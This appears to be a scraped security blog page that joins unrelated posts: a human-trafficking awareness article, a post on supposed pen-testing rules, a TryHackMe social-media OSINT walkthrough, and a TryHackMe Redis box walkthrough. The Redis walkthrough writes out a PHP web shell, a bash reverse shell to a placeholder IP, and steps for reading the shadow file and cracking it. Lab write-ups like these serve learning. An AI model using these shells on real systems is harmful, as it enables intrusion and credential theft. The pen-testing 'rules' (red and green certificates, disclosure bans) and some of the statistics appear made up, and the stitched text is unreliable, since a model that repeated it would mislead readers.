Understanding The Background Pain of Online Human Trafficking

Technology, particularly the Internet, has enabled sex trafficking and sexual exploitation to become the fastest growing criminal activity in the world. The increasing misuse of technology is changing the nature of trafficking, and so we must work by developing new ways to deal with it. Understanding The Background Pain Of Online Human Trafficking

The world of online technology and the Internet is helpful in trafficking us, as a result of which we keep hearing different news every day. Online resources such as open and classified advertisement sites, adult websites, social media platforms, chatrooms, extending into the dark-web enable traffickers to interact with an increasing number of potential victims.


According to Internet call, facebook is a huge market where things like this are done, for which everyone has to bear the consequences. According to the Human Trafficking Institute, the 2020 Federal Human Trafficking Report revealed that 59 percent of online sex is posted on Facebook.


The report was released to mark the 20th anniversary of the Trafficking Victims Protection Act (TVPA), which made human trafficking
a federal crime. Throughout this year’s edition of the report, it highlights data and trends that span across two decades of anti-trafficking enforcement in the U.S.

You will remember that most of the crimes related to kidnapping are being done offline because in the world of internet, child exploitation and victim requirement are happening very fast.

People's habits have become so much associated with facebook, snapchat, wechat even that instagram have also been identified as hotspots for sex trafficking cases.

Actually What is Human Trafficking ?

It is the illegal trade of human beings for the purposes of commerical sexual explloitation or reproductive slavery, or force labour or it called nowdays as modern day slavery.

Why is this happen ?

1) Because of trafficking is a lucrative industry. It has been identified as the fastest growing criminal industry in the world.
2) I guess unemployment, war, proverty are the key drives of human trafficking.
3) Homeless especially girl who run away from home (homeless), are great risk of being targeted by a pimp (or traffickers) and becoming exploited.
4) Usually caused by proverty/lack of economic opportunities, especially for women and children, and a demand for certain services in the destination country.
5) Traffickers use blackmail, abuse and threats to force victims to comply with their wishes in the destination country.
 

Who the victims ?

Generally females young girls, babies (they are born for the specific purpose being sold). Age is the greatest vulnerability factor.

According to google search, The top three states with highest number of Human trafficking incidents based on number of cases reported are West Bengal, Rajasthan and Gujarat and the top three states with highest number of Human trafficking incidents based on crime rates are West Bengal, Daman and Diu and Goa.


The list is compiled from the 2016 Crime in India Report published by National Crime Records Bureau (NCRB), Government of India
 

Indicators

Observations

1) Wounds, Bruises
2) Drug addiction
3) Hostility
4) No eye contact
5) Prepaid credit card or cell phone
6) False or no identification
7) Unable to provide name of school

 

How we can stop that ?

But it comes to how we can stop it because young people like us are going somewhere in the wrong direction, which maybe the coming generation can ask us the question that why it was not stopped at the right time, which will result in the coming time. People can also suffer. See, every coin has two sides, the more we stop the thing, the more it will increase, then we can make people aware because there is a lack of awareness in people. According to a report, cybercrime or vulnerability is more in the mind of human than in our system.

Credit: pixabay.com

1) This is not for promotion but for awareness, first of all share this article with others.
2) Organize a fundraiser where to raise a fund and use it to donate the proceeds to an anti-trafficking organization
3) The world of this online is very big, but if we see this type of content anywhere, then report it without hesitation. If you want to report anonymously, you can.
4) If you have knowledge about cyber security, then you can make people aware about cyber sec awareness by doing videos, articles or seminars etc.
5) Boycott products and companies that permit human trafficking.
6) Learn the indicators of human trafficking so you can help identify a potential trafficking victim. Human trafficking awareness training is available for individuals, businesses, first responders, law enforcement, educators, and federal employees, among others.


 

How to Report ?

It is a little difficult to go against someone, but if you fight for the truth or such things which are hollowing our society, then do not fear at all, you can report without hesitation even with anonymously or  and you can make people aware by becoming a Volunteer.

 

National Cyber Crime Reporting Portal :- CLICK HERE

Disclaimer

So guys, todays blog is very important and informative. Today's topic is what actually happens in a real life penetration testing.

There are so much rules and regulations for a beginner pen tester in a company. So in today's blog, I will share the steps which you have to follow while doing a pen test.

What are the steps when you work in a real company as pen tester ? So, if you want to read this blog till the end. Let's begin.

Firstly a proper aggrement is made defining you scope which contains what you can do and what you can't.

Company may specify that you can't use automated tools and sometimes you have exploit mannually No restriction on programming, you can make any programme and you can use it. 

Now a interesting thing, if you run a pen testing company and doing a pen testing engagement, your client can't change or deploy anything and this is the part of the rule. Suppose you have found all the vulnerabilities and made a proper report, the pen testing company will submit their client a red card. 

This is basically a red certificate saying that they have completed the pen test and submited the report. After that, client has 30 days to fix all the vulnerabilities. When it get fixed, the client will inform the pen test company. The pen testing company will again test the client's server using the same methods as before. If all the vulnerablilities get pached, the pen test company will issue a green certificate.


Now, lets come to rules. This specificly for Europian countries. A GDPR list is there to mesaure all the rate of vulnerabilities, so if somehow employe's data get leaked, government will charge the company and incase of any critical vulnerablities found, the company will have to do a pen test again in 2 months. This rule is for Europian countries.

Click Here 

 

Hope you remember I told you, once a pen test is done, client has only 1 months to patch all the vulnerablities. If client doesn't response in that time, and if the pen test company finds a new bug on the 31st day, they will charge client company. thats a rule too. 

Now if pen test is done and a bug is found within the 3 months of the previous pen test, they can't submit it, otherwise they will face legal consiquences. Because, if a new bug comes out within 3 months, it is considered that they knew it but didn't disclosed it. Thus legal problems can occur. There is a discloser policy where you can not share any pen test report within 3 months. You can not share anything regarding it. So many rules are there. It totaly depends countrywise and companywise.

Hope you liked today's blog and don't forget to share. You can't find these type of blog anywhere else. Its a very unknown topic. I would also like to give a big shoutout to Trident Security.

Disclaimer

In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



Prerequisites:


Critical Thinking.
A love of going deep into rabbit -holes.
Basic understanding of Google.
Python 3.7+

Task 2 Story

Background Information:


You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.  TryHackMe KaffeeSec - SoMeSINT


After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 

Answer the questions below


1) Who hired you?

Ans :- ks{H}


2) Who are you investigating? (ks{firstname lastname})

Ans :- ks{thomas straussman}

Task 3 Let's get started!!

Prerequisites:

Patience, curiosity, and a passion for digging into rabbit holes.
Firefox, Chrome, or another chromium-based browser (I recommend Brave).


How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.


The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.



Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



Answer the questions below


1) What is Thomas' favorite holiday?

Ans :- Christmas

Its mentioned in the bio as X-mas or Christmas

2) What is Thomas' birth date?

Ans :- 12-20-1990

His birthday is evident from the below reddit post.

3) What is Thomas' fiancee's Twitter handle?

Ans :- @fhodgelink



 

Looking at his followers we can find the twitter handle of his finacee.

4) What is Thomas' background picture of?

Ans :- Buddha

Task 4 Spider... what?

Requirements:

    Spiderfoot
    Python 3


First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).

Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

You can access the web interface by navigating to localhost:5001 in your browser.

Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 

Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 

If you find a Twitter account that leads to shadowban.eu, click on the link.

If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.

1) What was the source module used to find these accounts?

Ans :- sfp_accounts    

2) Check the shadowban API. What is the value of "search"?

Ans :- ks{1346173539712380929}

Task 5 Connections, connections..

Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!

At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


There are a few key types of information that we want to find from socials:

Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (For IMINT/GEOMINT purposes).

Clear images of the subject's face (For reverse image searches and possibly finding more accounts/sources of info).

Clear images of the subject in a group of people (Family photos, friend groups, other information that can give context to their relationship with the group).

Personal information in their bio, or other personal data from their profile itself (Where they grew up, currently live, went to school, etc..).

Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation to specific places? All this information can help in an investigation.)


Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

What personal information can you find?

NOTE: If you get stuck on the first flag, consider two things:

• You can reverse image search landscapes / locations and most likely get a result.
• You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.

Answer the questions below


1) Where did Thomas and his fiancee vacation to?

Ans :- Koblenz, Germany

Fiancé’s Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink) Its pretty straightforward as per the below picture. The flag format is City, Country (7 letters, 7 letters)

So,it will be in the format — — — -, Germany.

Doing a reverse search of this image, indicates its Koblenz in Germany.

2) When is Francesca's Mother's birthday? (without the year)

Ans :- Decemeber 25th

We can see the Above tweet

3) What is the name of their cat?

Ans :- Gotank

https://twitter.com/FHodgelink/status/1343023195855736837

4) What show does Francesca like to watch?

Ans :- 90 Day Fiancee

One of the tweets is the below one which shares the name of the program

Task 6 Turn back the clock!!

Now that we've gathered intel from Thomas and Francesca's Twitters, lets move to another platform - Reddit.


For the sake of this investigation, we're going to be using Reddit in two different ways:

Use the old version (http://old.reddit.com/) for wayback machine purposes

Use the new version (https://www.reddit.com/) for other purposes (later on)


First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


    Get it for Firefox
    Get it for Chrome
   

Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


So it hasn't been saved yet... Nothing out of the ordinary, right?

Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?


Answer the questions below


1) What is the name of Thomas' coworker?

Ans :- Hans Minik

I got stuck at this stage. Finally did a waybackmachine to check the snapshot for 21st Dec 2020

2) Where does his coworker live?

Ans :- Nuuk, Greenland

Thomas lives in Nuuk, as per his profile

 Looking into Hans reddit profile, we can find the following posts

3) What is the paste ID for the link we found? (flag format)

Ans :- ks{ww4ju}

Hans profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

4) Password for the next link? (flag format)

Ans :- ks{1qaz2wsx}

5) What is the name of Thomas' mistress?

Ans :- Emilia Moller

Paste the password obtained in above step to the url and the name will be shown.

6) What is Thomas' Email address?

Ans :- straussmanthom@mail.com

Disclaimer

The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Res Walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge! TryHackMe Res Redis pentesting Walkthrough

Let’s start of by scanning all ports using Nmap:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
Nmap scan report for 10.10.43.113
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint: #www.kumaratuljaiswal.in #www.hackingtruth.in
OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   224.93 ms 10.8.0.1
2   225.08 ms 10.10.43.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                              
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.


Port 80: Apache Web Server:

Let’s checkout the web server on port 80:

OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.

Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

Provided by https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce

 

To start with we need to download redis-tools, so we can have access to redis-cli:

sudo apt-get install redis-tools



To start redis-tools, from the command line we enter:

redis-cli -h [IP ADDRESS]

By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command. 

 

 

 

 

From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:

 

 

In firefox we can navigate to [IP-ADDRESS]/redis.php:

 

 

We can see that redis.php does indeed run phpinfo().

Let’s try this with another php script to run commands:


<? php system($_GET['cmd']); ?>



In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 

 

 

 

Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:

 

 

 

 

 

And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.

To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.

"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:

 

To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts. 

 

 

 

 

 

And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag. 

 

 

 

 

 

 

 

 

Wait here, so basically i can't clear my terminal if in your case has been same so dont worry we are here to reloved this issue. simple type this command and you will be able to clear your terminal.

 

export TERM=xterm 

 

 

 

 The result show a binary xxd with the SUID bit set and the owner is root. We can probably exploit this to read a file with full root privileges. The go to choice fo rlinux binary exploits is GTFOBins. 

 

 

Provided by GTFOBins

 

 

 

but all we will find the file with sudo permission with this type of command 

find / -perm -u=s -type f 2>/dev/null

 

 

 

Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file as the SUID bit set. I may be possible to read the shadow file and extract the hash for user vianka and we if we can brute force the hash to get the password.

 

 

 

 

 

Using this exploit we can print out the contents of the shadow file and copy Vianka hash. If I can brute force the hash using John we can simply SU as user Vianka.

 

 

 

 

 

 

Brute Forcing Vianka’s Hash with John:

To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.

 

echo "content" > local_shadow

echo "content" > local_passwd

unshadow passwd.txt shadow.txt > hash.txt

 

 

 

 

john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

 

 

 

 

 

 

Now, we have the password for user vianka,so we can simply 'su vianka' to change user to vianka:

 

 

 

 

 

 

 

And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

 

 

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal